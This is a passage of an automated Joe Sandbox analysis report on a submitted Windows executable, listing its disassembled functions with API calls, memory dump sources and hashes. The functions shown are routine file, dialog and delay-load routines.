                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: f1d293d8473448eee4950b32f88101ed63ca51bc9a9d5017a1dc44b909bada40
                                                                                        • Instruction ID: 1699ad4d8e104d9d64864efc4099f0391224a0759725872bc580d1fd22714bde
                                                                                        • Opcode Fuzzy Hash: f1d293d8473448eee4950b32f88101ed63ca51bc9a9d5017a1dc44b909bada40
                                                                                        • Instruction Fuzzy Hash: 0FB012EA268010FC3217F1051C02E37021CC4C8F10330D06FF82DC5480D8444C040533
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: b26eebfd5da2e3ef73c133ec161babc5d2fdf98d7e3f721e70a1f52dd4b90ea1
                                                                                        • Instruction ID: 683c8d6bee50e68af8d3547c10a50b34d8b423ba5145ef82c14128f8e43bd59c
                                                                                        • Opcode Fuzzy Hash: b26eebfd5da2e3ef73c133ec161babc5d2fdf98d7e3f721e70a1f52dd4b90ea1
                                                                                        • Instruction Fuzzy Hash: 94A002FA2B9152BD362BA2526D07D7B032DC4C9F25334E5AEF83DE98C1AD881C451873
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: 230bbc1ffeec47b69a95a47cd9392f1f28eeb2258608b933bf066c4c111fe5c6
                                                                                        • Instruction ID: 4d3bf34066a9e3b5b587f8fb058dc77f23aa080915473d566c7a8857e5f5371d
                                                                                        • Opcode Fuzzy Hash: 230bbc1ffeec47b69a95a47cd9392f1f28eeb2258608b933bf066c4c111fe5c6
                                                                                        • Instruction Fuzzy Hash: 76A002E5169151BC351651515D06D77021DC4C9F51334D55DF42995481594418451473
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: 84de9b57230a59255e9591952898b92051004fad1128f54b85df35e7e447f981
                                                                                        • Instruction ID: 4d3bf34066a9e3b5b587f8fb058dc77f23aa080915473d566c7a8857e5f5371d
                                                                                        • Opcode Fuzzy Hash: 84de9b57230a59255e9591952898b92051004fad1128f54b85df35e7e447f981
                                                                                        • Instruction Fuzzy Hash: 76A002E5169151BC351651515D06D77021DC4C9F51334D55DF42995481594418451473
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: d98d4f29269d1107f51a07a792933c609c59873a7ecaf05ea7885b42dab371d5
                                                                                        • Instruction ID: 4d3bf34066a9e3b5b587f8fb058dc77f23aa080915473d566c7a8857e5f5371d
                                                                                        • Opcode Fuzzy Hash: d98d4f29269d1107f51a07a792933c609c59873a7ecaf05ea7885b42dab371d5
                                                                                        • Instruction Fuzzy Hash: 76A002E5169151BC351651515D06D77021DC4C9F51334D55DF42995481594418451473
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: e9f09578398bf8ec26f4b49b33128f51321e6b3fcaf2bfd28fd4b3e7a0d63e33
                                                                                        • Instruction ID: 4d3bf34066a9e3b5b587f8fb058dc77f23aa080915473d566c7a8857e5f5371d
                                                                                        • Opcode Fuzzy Hash: e9f09578398bf8ec26f4b49b33128f51321e6b3fcaf2bfd28fd4b3e7a0d63e33
                                                                                        • Instruction Fuzzy Hash: 76A002E5169151BC351651515D06D77021DC4C9F51334D55DF42995481594418451473
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037E446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                          • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                          • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                        • String ID:
                                                                                        • API String ID: 1269201914-0
                                                                                        • Opcode ID: 6e7f55274f890cbab6d7225ad9b81131cc5c267fdfc4ea73b69925217b844075
                                                                                        • Instruction ID: 4d3bf34066a9e3b5b587f8fb058dc77f23aa080915473d566c7a8857e5f5371d
                                                                                        • Opcode Fuzzy Hash: 6e7f55274f890cbab6d7225ad9b81131cc5c267fdfc4ea73b69925217b844075
                                                                                        • Instruction Fuzzy Hash: 76A002E5169151BC351651515D06D77021DC4C9F51334D55DF42995481594418451473
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00369F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetEndOfFile.KERNELBASE(?,0036903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00369F0C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: File
                                                                                        • String ID:
                                                                                        • API String ID: 749574446-0
                                                                                        • Opcode ID: dee11678dffa002ed6cc83904fc30bc8a9ae56053490082a976cc1827e45e3dc
                                                                                        • Instruction ID: ea98fe1725eb9460ed20374a3a73965b577d8dd7e54f16aa78fa23687de090d2
                                                                                        • Opcode Fuzzy Hash: dee11678dffa002ed6cc83904fc30bc8a9ae56053490082a976cc1827e45e3dc
                                                                                        • Instruction Fuzzy Hash: 1EA022B008000E8BCE022B32CE0800C3B20FF22BC0B0002E8A00BCF0B2CB23882BCB00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,0037AE72,C:\Users\user\Desktop,00000000,003A946A,00000006), ref: 0037AC08
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory
                                                                                        • String ID:
                                                                                        • API String ID: 1611563598-0
                                                                                        • Opcode ID: 04ff0b072d0117875d5413b75d1dc765ca9641d7fa83c35726c626f88a217dda
                                                                                        • Instruction ID: 53db4b9d515396d07b5f37f3f469f2e05255378125d282579719673f75eb735c
                                                                                        • Opcode Fuzzy Hash: 04ff0b072d0117875d5413b75d1dc765ca9641d7fa83c35726c626f88a217dda
                                                                                        • Instruction Fuzzy Hash: E7A011B02002008B82022B328F0AA0EBAAAAFA2B00F00C02AA00080030CB32C820AA02
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 0037C220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
                                                                                          • Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370
                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0037C2B1
                                                                                        • EndDialog.USER32(?,00000006), ref: 0037C2C4
                                                                                        • GetDlgItem.USER32(?,0000006C), ref: 0037C2E0
                                                                                        • SetFocus.USER32(00000000), ref: 0037C2E7
                                                                                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 0037C321
                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0037C358
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0037C36E
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0037C38C
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0037C39C
                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0037C3B8
                                                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0037C3D4
                                                                                        • _swprintf.LIBCMT ref: 0037C404
                                                                                          • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                        • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0037C417
                                                                                        • FindClose.KERNEL32(00000000), ref: 0037C41E
                                                                                        • _swprintf.LIBCMT ref: 0037C477
                                                                                        • SetDlgItemTextW.USER32(?,00000068,?), ref: 0037C48A
                                                                                        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0037C4A7
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0037C4C7
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0037C4D7
                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0037C4F1
                                                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0037C509
                                                                                        • _swprintf.LIBCMT ref: 0037C535
                                                                                        • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0037C548
                                                                                        • _swprintf.LIBCMT ref: 0037C59C
                                                                                        • SetDlgItemTextW.USER32(?,00000069,?), ref: 0037C5AF
                                                                                          • Part of subcall function 0037AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0037AF35
                                                                                          • Part of subcall function 0037AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0039E72C,?,?), ref: 0037AF84
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                        • String ID: %s %s$%s %s %s$P7$REPLACEFILEDLG
                                                                                        • API String ID: 797121971-618955506
                                                                                        • Opcode ID: 4a36d9305bab99e8b1d66d943a97fdac5bbdc4d436a134b0c5142abf43c87fe2
                                                                                        • Instruction ID: f61cd2cb42d4e5ee8e183849cc0644f6a614b6b7b071b11c346723ea2d26d3d0
                                                                                        • Opcode Fuzzy Hash: 4a36d9305bab99e8b1d66d943a97fdac5bbdc4d436a134b0c5142abf43c87fe2
                                                                                        • Instruction Fuzzy Hash: 2C919672148348BFD633EBA4CC49FFB77ACEB4A704F048819F649D6091D775AA048B62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00366FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00366FAA
                                                                                        • _wcslen.LIBCMT ref: 00367013
                                                                                        • _wcslen.LIBCMT ref: 00367084
                                                                                          • Part of subcall function 00367A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00367AAB
                                                                                          • Part of subcall function 00367A9C: GetLastError.KERNEL32 ref: 00367AF1
                                                                                          • Part of subcall function 00367A9C: CloseHandle.KERNEL32(?), ref: 00367B00
                                                                                          • Part of subcall function 0036A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0036977F,?,?,003695CF,?,?,?,?,?,00392641,000000FF), ref: 0036A1F1
                                                                                          • Part of subcall function 0036A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0036977F,?,?,003695CF,?,?,?,?,?,00392641), ref: 0036A21F
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00367139
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00367155
                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00367298
                                                                                          • Part of subcall function 00369DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,003673BC,?,?,?,00000000), ref: 00369DBC
                                                                                          • Part of subcall function 00369DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00369E70
                                                                                          • Part of subcall function 00369620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,003695D6,?,?,?,?,?,00392641,000000FF), ref: 0036963B
                                                                                          • Part of subcall function 0036A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A501
                                                                                          • Part of subcall function 0036A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0036A325,?,?,?,0036A175,?,00000001,00000000,?,?), ref: 0036A532
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
                                                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                        • API String ID: 2821348736-3508440684
                                                                                        • Opcode ID: eb814e16ad799b9f54c873b9194338ade8f3833c9cedce4f63d02ade62ffb98d
                                                                                        • Instruction ID: 6f499d96adb8e1d1ff0ad073340ff1cd7a2e49af8aea03cf4381ae7f151d15dd
                                                                                        • Opcode Fuzzy Hash: eb814e16ad799b9f54c873b9194338ade8f3833c9cedce4f63d02ade62ffb98d
                                                                                        • Instruction Fuzzy Hash: 5EC109B5D04604AADB23DB74CC42FEFB3ACAF04304F40855AF956EB286D734AA44CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0038D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: __floor_pentium4
                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                        • API String ID: 4168288129-2761157908
                                                                                        • Opcode ID: 76822b3ae1ac756fa6ae0a95636ff24416615369e9daba5da811f5fceb519407
                                                                                        • Instruction ID: 127c8040975b9f16711afbff47ad6874f6ea9d25a5383164c9377365a7a7797d
                                                                                        • Opcode Fuzzy Hash: 76822b3ae1ac756fa6ae0a95636ff24416615369e9daba5da811f5fceb519407
                                                                                        • Instruction Fuzzy Hash: 1BC23E71E046288FDB66EF28DD407E9B7B9EB84305F1541EAD44DE7280E775AE818F40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 003632F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
